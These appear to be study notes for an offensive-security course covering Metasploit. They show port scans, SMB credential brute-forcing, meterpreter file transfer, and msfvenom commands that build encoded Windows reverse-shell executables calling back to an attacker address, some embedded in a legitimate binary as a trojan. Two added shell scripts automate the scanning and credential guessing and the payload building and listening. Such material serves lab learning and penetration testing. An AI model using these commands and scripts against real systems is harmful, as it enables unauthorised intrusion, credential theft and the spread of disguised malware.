Metasploit

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > back
msf6 > 

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > previous
msf6 auxiliary(scanner/portscan/tcp) > 

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.120.11
RHOSTS => 192.168.120.11

msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.120.11:       - 192.168.120.11:80 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:139 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:135 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:445 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:5040 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:5357 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:7680 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:9121 - TCP OPEN
[*] 192.168.120.11:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/portscan/tcp) > services
Services
========

host            port  proto  name           state  info
----            ----  -----  ----           -----  ----
192.168.120.11  80    tcp                   open   
192.168.120.11  135   tcp                   open   
192.168.120.11  139   tcp                   open   
192.168.120.11  445   tcp                   open   
192.168.120.11  5040  tcp                   open   
192.168.120.11  5357  tcp                   open   
192.168.120.11  7680  tcp                   open   
192.168.120.11  9121  tcp                   open 

msf6 auxiliary(scanner/portscan/tcp) > db_nmap
[*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
msf6 auxiliary(scanner/portscan/tcp) > db_nmap 192.168.120.11 -A -Pn
[*] Nmap: 'Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.'
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-21 11:37 EST
[*] Nmap: Nmap scan report for 192.168.120.11
[*] Nmap: Host is up (0.075s latency).
[*] Nmap: Not shown: 995 closed ports
...

msf6 auxiliary(scanner/portscan/tcp) > hosts

Hosts
=====

address         mac  name             os_name       os_flavor  os_sp  purpose  info  comments
-------         ---  ----             -------       ---------  -----  -------  ----  --------
192.168.120.11       DESKTOP-6UTT671  Windows 2008                    server         
192.168.121.10       CLIENT251        Windows 10    Pro               client         

msf6 auxiliary(scanner/portscan/tcp) > services -p 445
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.120.11  445   tcp    microsoft-ds  open  

msf6 auxiliary(scanner/portscan/tcp) > workspace
  test
* default
msf6 auxiliary(scanner/portscan/tcp) > workspace test
[*] Workspace: test
msf6 auxiliary(scanner/portscan/tcp) > 

in msfconsole

search -h
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_version
info
# query the database for hosts with port 445 open and set RHOSTS on the active module to them (-R / --rhosts)
services -p 445 --rhosts 
run
use auxiliary/scanner/smb/smb_login
options
set SMBUser Offsec
set SMBPass notarealpassword
# setg sets the option globally, so every module used afterwards inherits it
setg RHOSTS 192.168.120.11
set THREADS 10
run
set SMBPass Qwerty09!
run
# successful logins are saved to the database; creds lists them
creds
# USERPASS_FILE holds one "user password" pair per line
set USERPASS_FILE /home/kali/users.txt
run
use auxiliary/scanner/rdp/rdp_scanner
show options
run
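The msfconsole sequence above can be replayed unattended from a resource script, which is just the console commands one per line. The following script is an added example (not part of the original notes): it writes the .rc file and launches msfconsole -q -r against it; the target range, the credential file path and the output file name are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes: generate a Metasploit resource
# script that replays the msfconsole sequence above, then run it with
# `msfconsole -q -r`. Each line of the .rc file is exactly what you would type
# at the msf6 prompt; msfconsole executes it top to bottom.

# write_scan_rc RHOSTS USERPASS_FILE OUTFILE
#   RHOSTS        target host, range or CIDR (same syntax as the RHOSTS option)
#   USERPASS_FILE file with one "user password" pair per line
#   OUTFILE       resource script to write
write_scan_rc() {
    cat > "$3" <<EOF
# global options are inherited by every module used below
setg RHOSTS $1
setg THREADS 10
# 1. TCP connect scan; open ports are stored in the database (see: services)
use auxiliary/scanner/portscan/tcp
set PORTS 1-10000
run
# 2. fingerprint SMB only on the hosts that exposed port 445
use auxiliary/scanner/smb/smb_version
services -p 445 --rhosts
run
# 3. credential check against the same hosts; stop per host after the first hit
use auxiliary/scanner/smb/smb_login
services -p 445 --rhosts
set USERPASS_FILE $2
set STOP_ON_SUCCESS true
run
# 4. report what the login scan saved
creds
EOF
}

# run_scan RHOSTS USERPASS_FILE: write the script and hand it to msfconsole
# (-q suppresses the banner, -r runs the resource file).
run_scan() {
    write_scan_rc "$1" "$2" scan.rc
    msfconsole -q -r scan.rc
}

# usage (placeholder values): ./scan.sh 192.168.120.0/24 /home/kali/userpass.txt
if [ "$#" -eq 2 ]; then
    run_scan "$1" "$2"
fi
```

The two `services -p 445 --rhosts` lines are deliberate: `--rhosts` sets RHOSTS on the module that is active at that moment, so it is repeated after each `use`. Everything the script finds lands in the same workspace, so `hosts`, `services` and `creds` still work interactively afterwards.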

Note that in Metasploit, the "/" character is used to denote whether a payload is staged or not, so "shell_reverse_tcp" is not staged (stageless), whereas "shell/reverse_tcp" is.

staged = delivered in 2 parts: a small stager that connects back and downloads the rest of the payload (the stage, e.g. the shell or meterpreter) from the handler. A staged payload therefore needs exploit/multi/handler, configured with the same payload, to catch the connection and send the stage; a stageless shell_reverse_tcp carries everything and can be caught with a plain nc -nlvp listener. Staged payloads are smaller, which matters when the exploit only has limited buffer space.

meterpreter

sysinfo
getuid
# Windows paths: escape the backslashes (\\) or quote the path
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\Offsec
download "c:\windows\system32\calc.exe" /tmp/calc.exe
shell

msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
  • -e to specify the encoder type

  • -i to set the desired number of encoding iterations (historically an attempt at antivirus evasion; encoders such as x86/shikata_ga_nai are well known to AV engines, so extra iterations buy little today)

  • -x inject a payload into an existing PE file, used as a template; add -k to keep the template's original behaviour and run the payload in a new thread, otherwise the resulting executable only runs the payload

A little-known trick is that this can also be done from within msfconsole with the generate command, after selecting the payload with use payload/windows/shell_reverse_tcp and setting LHOST and LPORT (generate reads them from the module's datastore). For example, the following recreates the previous msfvenom example:

msf6 payload(windows/shell_reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
[*] Writing 311296 bytes to shell_reverse_msf_encoded_embedded.exe...
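Choosing the listener is the step that most often goes wrong with the staged/stageless distinction above: a stageless payload can be caught with nc, a staged one only with multi/handler. The script below is an added example (not part of the original notes) that decides this from the payload name, writes the matching handler resource script and builds the payload with msfvenom. It extends the "/" rule from the notes to names with an architecture component such as windows/x64/meterpreter_reverse_tcp, which the bare rule would misclassify; LHOST/LPORT, the template and the file names are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes: pick the right listener for a
# payload name, write the multi/handler resource script, and build the payload
# with msfvenom. LHOST/LPORT, template and file names are placeholders.

# is_staged PAYLOAD -> 0 if staged, 1 if stageless. For staged payloads the
# component before the last one is the stage name:
#   windows/shell/reverse_tcp            -> "shell"       -> staged
#   windows/x64/meterpreter/reverse_tcp  -> "meterpreter" -> staged
#   windows/shell_reverse_tcp            -> "windows"     -> stageless
#   windows/x64/meterpreter_reverse_tcp  -> "x64"         -> stageless
# Naming heuristic only; `msfvenom --list payloads` or `info` is authoritative.
is_staged() {
    stagedir=${1%/*}
    case "${stagedir##*/}" in
        shell|meterpreter|vncinject|dllinject|custom) return 0 ;;
        *) return 1 ;;
    esac
}

# listener_cmd PAYLOAD LHOST LPORT -> prints the command that can receive it.
# A stageless payload is a complete shell, so any TCP listener works. A staged
# payload only sends the stager; the listener must answer with the stage, and
# only exploit/multi/handler configured with the same payload does that.
listener_cmd() {
    if is_staged "$1"; then
        echo "msfconsole -q -r handler.rc"
    else
        echo "nc -nlvp $3"
    fi
}

# handler_rc PAYLOAD LHOST LPORT OUTFILE -> writes a multi/handler resource
# script that keeps listening for further callbacks (-j background job,
# ExitOnSession false).
handler_rc() {
    cat > "$4" <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j
EOF
}

# build_payload PAYLOAD LHOST LPORT OUTFILE [TEMPLATE]
# With a template (-x), -k keeps the template's own behaviour and runs the
# payload in a new thread; without -k the result only runs the payload.
build_payload() {
    if [ -n "${5:-}" ]; then
        msfvenom -p "$1" LHOST="$2" LPORT="$3" -f exe -x "$5" -k -o "$4"
    else
        msfvenom -p "$1" LHOST="$2" LPORT="$3" -f exe -o "$4"
    fi
}

# usage (placeholders): ./payload.sh windows/shell/reverse_tcp 192.168.118.2 443 shell.exe [plink.exe]
if [ "$#" -ge 4 ]; then
    build_payload "$1" "$2" "$3" "$4" "${5:-}"
    handler_rc "$1" "$2" "$3" handler.rc
    echo "start this listener before running $4 on the target:"
    listener_cmd "$1" "$2" "$3"
fi
```

The listener must be up before the payload runs on the target: a staged stager that connects and gets no stage back simply exits, and nothing in the handler will tell you why.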
